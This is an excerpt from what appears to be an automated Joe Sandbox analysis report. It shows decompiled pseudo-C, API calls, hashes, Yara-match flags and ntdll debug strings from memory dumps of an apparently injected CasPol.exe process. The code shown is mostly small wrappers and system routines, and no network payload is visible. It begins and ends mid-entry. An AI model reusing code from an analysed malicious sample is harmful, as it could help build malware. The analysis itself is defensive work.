                                                                  • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 189 41e8a3-41e8b9 190 41e8bf-41e8d4 RtlFreeHeap 189->190 191 41e8ba call 41f203 189->191 191->190
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                  • Instruction ID: 81649b4115f882acd630a205a6666d0b6fa7ed995dd6d0d074ea88b8b0e80a3e
                                                                  • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                  • Instruction Fuzzy Hash: 1EE012B6600208ABCB14EF89DC49EA737ACAF88754F018059FE095B282C630E914CAB1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0041EA03(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                  				int _t10;
                                                                  
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x6d4)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x6d4)), 0, 0x46);
                                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                  				return _t10;
                                                                  			}





                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                  • Instruction ID: 26638fb517edf30d6313ba082fa82f18f9a37f2b762b1a37e3fac1042cbd1374
                                                                  • Opcode Fuzzy Hash: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                  • Instruction Fuzzy Hash: 83E01AB56002086BC710DF89DC45EE737ADAF88654F014065FE0857242C635E8148BB5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E0041E8D7(intOrPtr _a4, int _a8) {
                                                                  
                                                                  				asm("adc eax, 0xbb2eba75");
                                                                  				_t7 = _a4;
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
                                                                  				ExitProcess(_a8);
                                                                  			}



                                                                  0x0041e8d7
                                                                  0x0041e8e6
                                                                  0x0041e8fd
                                                                  0x0041e90b

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
                                                                  • Instruction ID: 5c0109bf3c017ec3e38722d5e3a7691f356bf1999787dbf9d42864a55b6ec0fa
                                                                  • Opcode Fuzzy Hash: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
                                                                  • Instruction Fuzzy Hash: E3E08C36A00210BBCB209F85CC86FD737A8EF85690F1480A8B9595B341D278EA41C7E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0041E8E3(intOrPtr _a4, int _a8) {
                                                                  
                                                                  				_t5 = _a4;
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
                                                                  				ExitProcess(_a8);
                                                                  			}



                                                                  0x0041e8e6
                                                                  0x0041e8fd
                                                                  0x0041e90b

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
                                                                  • Instruction ID: b4e5e56741419d1f277733bd979a6942edbd6e735fed61574da432c381a3350b
                                                                  • Opcode Fuzzy Hash: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
                                                                  • Instruction Fuzzy Hash: 34D0C232B002047BC620DF88CC45FD3379CDF44650F0080A5BA0C5B241C631BA00C7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                  • Instruction ID: 750e433a6b7849f822becc92f6b04cfcf815011e590c3758b4f193371c1a9ae6
                                                                  • Opcode Fuzzy Hash: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                  • Instruction Fuzzy Hash: 18E0C2B92083846FD700EF65C8408E77BA4EF89304714889EFCEA47202C331D86A8BB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dd0cb9ff169640ca7669cc242ecdf015d4e57fb9a150917db41a03b84e8283b2
                                                                  • Instruction ID: c4a5c7a46777d4f9b6b0a3e630eea435ca492c93f056e880eef2ddc811e915ca
                                                                  • Opcode Fuzzy Hash: dd0cb9ff169640ca7669cc242ecdf015d4e57fb9a150917db41a03b84e8283b2
                                                                  • Instruction Fuzzy Hash: B3B09B71D064C5C6F611D7A44608717790477D4745F16C053D1060692B4778C091F5B5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • The resource is owned shared by %d threads, xrefs: 014AB37E
                                                                  • *** then kb to get the faulting stack, xrefs: 014AB51C
                                                                  • The instruction at %p tried to %s , xrefs: 014AB4B6
                                                                  • The resource is owned exclusively by thread %p, xrefs: 014AB374
                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014AB3D6
                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014AB2DC
                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014AB47D
                                                                  • write to, xrefs: 014AB4A6
                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 014AB2F3
                                                                  • an invalid address, %p, xrefs: 014AB4CF
                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014AB484
                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014AB314
                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014AB38F
                                                                  • *** Inpage error in %ws:%s, xrefs: 014AB418
                                                                  • Go determine why that thread has not released the critical section., xrefs: 014AB3C5
                                                                  • The instruction at %p referenced memory at %p., xrefs: 014AB432
                                                                  • *** enter .exr %p for the exception record, xrefs: 014AB4F1
                                                                  • a NULL pointer, xrefs: 014AB4E0
                                                                  • <unknown>, xrefs: 014AB27E, 014AB2D1, 014AB350, 014AB399, 014AB417, 014AB48E
                                                                  • The critical section is owned by thread %p., xrefs: 014AB3B9
                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014AB39B
                                                                  • read from, xrefs: 014AB4AD, 014AB4B2
                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014AB53F
                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 014AB352
                                                                  • This failed because of error %Ix., xrefs: 014AB446
                                                                  • *** enter .cxr %p for the context, xrefs: 014AB50D
                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014AB476
                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 014AB48F
                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014AB323
                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014AB305
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                  • API String ID: 0-108210295
                                                                  • Opcode ID: ea944c781b244ba2d8580e41b67c9cfba35b85ddbc60b57032883da5c9448dc2
                                                                  • Instruction ID: 17a82652392b88a07e45d6ff40982f3051a3c18d97aedcda8dd4cb9375af480c
                                                                  • Opcode Fuzzy Hash: ea944c781b244ba2d8580e41b67c9cfba35b85ddbc60b57032883da5c9448dc2
                                                                  • Instruction Fuzzy Hash: A1813131A00220FFDB21BA4A9C49D6F3B66EF76A59F82405AF5052F372D3718452C7A2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E014751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                  				signed short* _t63;
                                                                  				signed int _t64;
                                                                  				signed int _t65;
                                                                  				signed int _t67;
                                                                  				intOrPtr _t74;
                                                                  				intOrPtr _t84;
                                                                  				intOrPtr _t88;
                                                                  				intOrPtr _t94;
                                                                  				void* _t100;
                                                                  				void* _t103;
                                                                  				intOrPtr _t105;
                                                                  				signed int _t106;
                                                                  				short* _t108;
                                                                  				signed int _t110;
                                                                  				signed int _t113;
                                                                  				signed int* _t115;
                                                                  				signed short* _t117;
                                                                  				void* _t118;
                                                                  				void* _t119;
                                                                  
                                                                  				_push(0x80);
                                                                  				_push(0x14d05f0);
                                                                  				E0144D0E8(__ebx, __edi, __esi);
                                                                  				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                  				_t115 =  *(_t118 + 0xc);
                                                                  				 *(_t118 - 0x7c) = _t115;
                                                                  				 *((char*)(_t118 - 0x65)) = 0;
                                                                  				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                  				_t113 = 0;
                                                                  				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                  				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                  				_t100 = __ecx;
                                                                  				if(_t100 == 0) {
                                                                  					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                  					L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                  					 *((char*)(_t118 - 0x65)) = 1;
                                                                  					_t63 =  *(_t118 - 0x90);
                                                                  					_t101 = _t63[2];
                                                                  					_t64 =  *_t63 & 0x0000ffff;
                                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                  					L20:
                                                                  					_t65 = _t64 >> 1;
                                                                  					L21:
                                                                  					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                  					if(_t108 == 0) {
                                                                  						L27:
                                                                  						 *_t115 = _t65 + 1;
                                                                  						_t67 = 0xc0000023;
                                                                  						L28:
                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                  						L29:
                                                                  						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                  						E014753CA(0);
                                                                  						return E0144D130(0, _t113, _t115);
                                                                  					}
                                                                  					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                  						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                  							 *_t108 = 0;
                                                                  						}
                                                                  						goto L27;
                                                                  					}
                                                                  					 *_t115 = _t65;
                                                                  					_t115 = _t65 + _t65;
                                                                  					E0143F3E0(_t108, _t101, _t115);
                                                                  					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                  					_t67 = 0;
                                                                  					goto L28;
                                                                  				}
                                                                  				_t103 = _t100 - 1;
                                                                  				if(_t103 == 0) {
                                                                  					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                  					_t74 = L01413690(1, _t117, 0x13d1810, _t118 - 0x74);
                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                  					_t101 = _t117[2];
                                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                  					if(_t74 < 0) {
                                                                  						_t64 =  *_t117 & 0x0000ffff;
                                                                  						_t115 =  *(_t118 - 0x7c);
                                                                  						goto L20;
                                                                  					}
                                                                  					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                  					_t115 =  *(_t118 - 0x7c);
                                                                  					goto L21;
                                                                  				}
                                                                  				if(_t103 == 1) {
                                                                  					_t105 = 4;
                                                                  					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                  					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                  					_push(_t118 - 0x70);
                                                                  					_push(0);
                                                                  					_push(0);
                                                                  					_push(_t105);
                                                                  					_push(_t118 - 0x78);
                                                                  					_push(0x6b);
                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = E0143AA90();
                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                  					_t113 = L01414620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                  					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                  					if(_t113 != 0) {
                                                                  						_push(_t118 - 0x70);
                                                                  						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                  						_push(_t113);
                                                                  						_push(4);
                                                                  						_push(_t118 - 0x78);
                                                                  						_push(0x6b);
                                                                  						_t84 = E0143AA90();
                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                  						if(_t84 < 0) {
                                                                  							goto L29;
                                                                  						}
                                                                  						_t110 = 0;
                                                                  						_t106 = 0;
                                                                  						while(1) {
                                                                  							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                  							 *(_t118 - 0x88) = _t106;
                                                                  							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                  								break;
                                                                  							}
                                                                  							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                  							_t106 = _t106 + 1;
                                                                  						}
                                                                  						_t88 = E0147500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                  						_t119 = _t119 + 0x1c;
                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                  						if(_t88 < 0) {
                                                                  							goto L29;
                                                                  						}
                                                                  						_t101 = _t118 - 0x3c;
                                                                  						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                  						goto L21;
                                                                  					}
                                                                  					_t67 = 0xc0000017;
                                                                  					goto L28;
                                                                  				}
                                                                  				_push(0);
                                                                  				_push(0x20);
                                                                  				_push(_t118 - 0x60);
                                                                  				_push(0x5a);
                                                                  				_t94 = E01439860();
                                                                  				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                  				if(_t94 < 0) {
                                                                  					goto L29;
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                  					_t101 = L"Legacy";
                                                                  					_push(6);
                                                                  				} else {
                                                                  					_t101 = L"UEFI";
                                                                  					_push(4);
                                                                  				}
                                                                  				_pop(_t65);
                                                                  				goto L21;
                                                                  			}























                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: ca48fc466c006e09ed91316f3bde217026d084aa4c699b1dc2e72ddf09f90fef
                                                                  • Instruction ID: 720fa8eb764d2b89205582ddb77f01727253b34245818f627521c9f7adec2d2d
                                                                  • Opcode Fuzzy Hash: ca48fc466c006e09ed91316f3bde217026d084aa4c699b1dc2e72ddf09f90fef
                                                                  • Instruction Fuzzy Hash: D9516EB1E006099FDB25DFA9C940AAEBBF8FF58704F14442EE649EF261DB719901CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 76%
                                                                  			E0141B944(signed int* __ecx, char __edx) {
                                                                  				signed int _v8;
                                                                  				signed int _v16;
                                                                  				signed int _v20;
                                                                  				char _v28;
                                                                  				signed int _v32;
                                                                  				char _v36;
                                                                  				signed int _v40;
                                                                  				intOrPtr _v44;
                                                                  				signed int* _v48;
                                                                  				signed int _v52;
                                                                  				signed int _v56;
                                                                  				intOrPtr _v60;
                                                                  				intOrPtr _v64;
                                                                  				intOrPtr _v68;
                                                                  				intOrPtr _v72;
                                                                  				intOrPtr _v76;
                                                                  				char _v77;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t65;
                                                                  				intOrPtr _t67;
                                                                  				intOrPtr _t68;
                                                                  				char* _t73;
                                                                  				intOrPtr _t77;
                                                                  				intOrPtr _t78;
                                                                  				signed int _t82;
                                                                  				intOrPtr _t83;
                                                                  				void* _t87;
                                                                  				char _t88;
                                                                  				intOrPtr* _t89;
                                                                  				intOrPtr _t91;
                                                                  				void* _t97;
                                                                  				intOrPtr _t100;
                                                                  				void* _t102;
                                                                  				void* _t107;
                                                                  				signed int _t108;
                                                                  				intOrPtr* _t112;
                                                                  				void* _t113;
                                                                  				intOrPtr* _t114;
                                                                  				intOrPtr _t115;
                                                                  				intOrPtr _t116;
                                                                  				intOrPtr _t117;
                                                                  				signed int _t118;
                                                                  				void* _t130;
                                                                  
                                                                  				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                  				_v8 =  *0x14ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                  				_t112 = __ecx;
                                                                  				_v77 = __edx;
                                                                  				_v48 = __ecx;
                                                                  				_v28 = 0;
                                                                  				_t5 = _t112 + 0xc; // 0x575651ff
                                                                  				_t105 =  *_t5;
                                                                  				_v20 = 0;
                                                                  				_v16 = 0;
                                                                  				if(_t105 == 0) {
                                                                  					_t50 = _t112 + 4; // 0x5de58b5b
                                                                  					_t60 =  *__ecx |  *_t50;
                                                                  					if(( *__ecx |  *_t50) != 0) {
                                                                  						 *__ecx = 0;
                                                                  						__ecx[1] = 0;
                                                                  						if(E01417D50() != 0) {
                                                                  							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  						} else {
                                                                  							_t65 = 0x7ffe0386;
                                                                  						}
                                                                  						if( *_t65 != 0) {
                                                                  							L014C8CD6(_t112);
                                                                  						}
                                                                  						_push(0);
                                                                  						_t52 = _t112 + 0x10; // 0x778df98b
                                                                  						_push( *_t52);
                                                                  						_t60 = L01439E20();
                                                                  					}
                                                                  					L20:
                                                                  					_pop(_t107);
                                                                  					_pop(_t113);
                                                                  					_pop(_t87);
                                                                  					return L0143B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                  				}
                                                                  				_t8 = _t112 + 8; // 0x8b000cc2
                                                                  				_t67 =  *_t8;
                                                                  				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                  				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                  				_t108 =  *(_t67 + 0x14);
                                                                  				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                  				_t105 = 0x2710;
                                                                  				asm("sbb eax, edi");
                                                                  				_v44 = _t88;
                                                                  				_v52 = _t108;
                                                                  				_t60 = L0143CE00(_t97, _t68, 0x2710, 0);
                                                                  				_v56 = _t60;
                                                                  				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                  					L3:
                                                                  					 *(_t112 + 0x44) = _t60;
                                                                  					_t105 = _t60 * 0x2710 >> 0x20;
                                                                  					 *_t112 = _t88;
                                                                  					 *(_t112 + 4) = _t108;
                                                                  					_v20 = _t60 * 0x2710;
                                                                  					_v16 = _t60 * 0x2710 >> 0x20;
                                                                  					if(_v77 != 0) {
                                                                  						L16:
                                                                  						_v36 = _t88;
                                                                  						_v32 = _t108;
                                                                  						if(E01417D50() != 0) {
                                                                  							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  						} else {
                                                                  							_t73 = 0x7ffe0386;
                                                                  						}
                                                                  						if( *_t73 != 0) {
                                                                  							_t105 = _v40;
                                                                  							L014C8F6A(_t112, _v40, _t88, _t108);
                                                                  						}
                                                                  						_push( &_v28);
                                                                  						_push(0);
                                                                  						_push( &_v36);
                                                                  						_t48 = _t112 + 0x10; // 0x778df98b
                                                                  						_push( *_t48);
                                                                  						_t60 = L0143AF60();
                                                                  						goto L20;
                                                                  					} else {
                                                                  						_t89 = 0x7ffe03b0;
                                                                  						do {
                                                                  							_t114 = 0x7ffe0010;
                                                                  							do {
                                                                  								_t77 =  *0x14e8628; // 0x0
                                                                  								_v68 = _t77;
                                                                  								_t78 =  *0x14e862c; // 0x0
                                                                  								_v64 = _t78;
                                                                  								_v72 =  *_t89;
                                                                  								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                  								while(1) {
                                                                  									_t105 =  *0x7ffe000c;
                                                                  									_t100 =  *0x7ffe0008;
                                                                  									if(_t105 ==  *_t114) {
                                                                  										goto L8;
                                                                  									}
                                                                  									asm("pause");
                                                                  								}
                                                                  								L8:
                                                                  								_t89 = 0x7ffe03b0;
                                                                  								_t115 =  *0x7ffe03b0;
                                                                  								_t82 =  *0x7FFE03B4;
                                                                  								_v60 = _t115;
                                                                  								_t114 = 0x7ffe0010;
                                                                  								_v56 = _t82;
                                                                  							} while (_v72 != _t115 || _v76 != _t82);
                                                                  							_t83 =  *0x14e8628; // 0x0
                                                                  							_t116 =  *0x14e862c; // 0x0
                                                                  							_v76 = _t116;
                                                                  							_t117 = _v68;
                                                                  						} while (_t117 != _t83 || _v64 != _v76);
                                                                  						asm("sbb edx, [esp+0x24]");
                                                                  						_t102 = _t100 - _v60 - _t117;
                                                                  						_t112 = _v48;
                                                                  						_t91 = _v44;
                                                                  						asm("sbb edx, eax");
                                                                  						_t130 = _t105 - _v52;
                                                                  						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                  							_t88 = _t102 - _t91;
                                                                  							asm("sbb edx, edi");
                                                                  							_t108 = _t105;
                                                                  						} else {
                                                                  							_t88 = 0;
                                                                  							_t108 = 0;
                                                                  						}
                                                                  						goto L16;
                                                                  					}
                                                                  				} else {
                                                                  					if( *(_t112 + 0x44) == _t60) {
                                                                  						goto L20;
                                                                  					}
                                                                  					goto L3;
                                                                  				}
                                                                  			}

                                                                  0x0141ba18
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0141bb26
                                                                  0x0141bb26
                                                                  0x0141ba1e
                                                                  0x0141ba1e
                                                                  0x0141ba23
                                                                  0x0141ba25
                                                                  0x0141ba2c
                                                                  0x0141ba30
                                                                  0x0141ba35
                                                                  0x0141ba35
                                                                  0x0141ba41
                                                                  0x0141ba46
                                                                  0x0141ba4c
                                                                  0x0141ba50
                                                                  0x0141ba54
                                                                  0x0141ba6a
                                                                  0x0141ba6e
                                                                  0x0141ba70
                                                                  0x0141ba74
                                                                  0x0141ba78
                                                                  0x0141ba7a
                                                                  0x0141ba7c
                                                                  0x0141ba8e
                                                                  0x0141ba90
                                                                  0x0141ba92
                                                                  0x0141bb14
                                                                  0x0141bb14
                                                                  0x0141bb16
                                                                  0x0141bb16
                                                                  0x00000000
                                                                  0x0141ba7c
                                                                  0x0141bb0a
                                                                  0x0141bb0d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0141bb0f

                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0141B9A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 885266447-0
                                                                  • Opcode ID: 4130d9efb275e5b0f1e5b7c007ee4c0e3169df1a1b13f7e88cab1c183620d033
                                                                  • Instruction ID: 8d61aeced6279e58ca3e69d61fcda6ef66e515b50288726f50cbd964a33c5497
                                                                  • Opcode Fuzzy Hash: 4130d9efb275e5b0f1e5b7c007ee4c0e3169df1a1b13f7e88cab1c183620d033
                                                                  • Instruction Fuzzy Hash: 79515771A08341CFC721DF69C48092BBBF5FB88650F14896FEA8997769D770E841CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 78%
                                                                  			E013FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                  				signed int _t65;
                                                                  				signed short _t69;
                                                                  				intOrPtr _t70;
                                                                  				signed short _t85;
                                                                  				void* _t86;
                                                                  				signed short _t89;
                                                                  				signed short _t91;
                                                                  				intOrPtr _t92;
                                                                  				intOrPtr _t97;
                                                                  				intOrPtr* _t98;
                                                                  				signed short _t99;
                                                                  				signed short _t101;
                                                                  				void* _t102;
                                                                  				char* _t103;
                                                                  				signed short _t104;
                                                                  				intOrPtr* _t110;
                                                                  				void* _t111;
                                                                  				void* _t114;
                                                                  				intOrPtr* _t115;
                                                                  
                                                                  				_t109 = __esi;
                                                                  				_t108 = __edi;
                                                                  				_t106 = __edx;
                                                                  				_t95 = __ebx;
                                                                  				_push(0x90);
                                                                  				_push(0x14cf7a8);
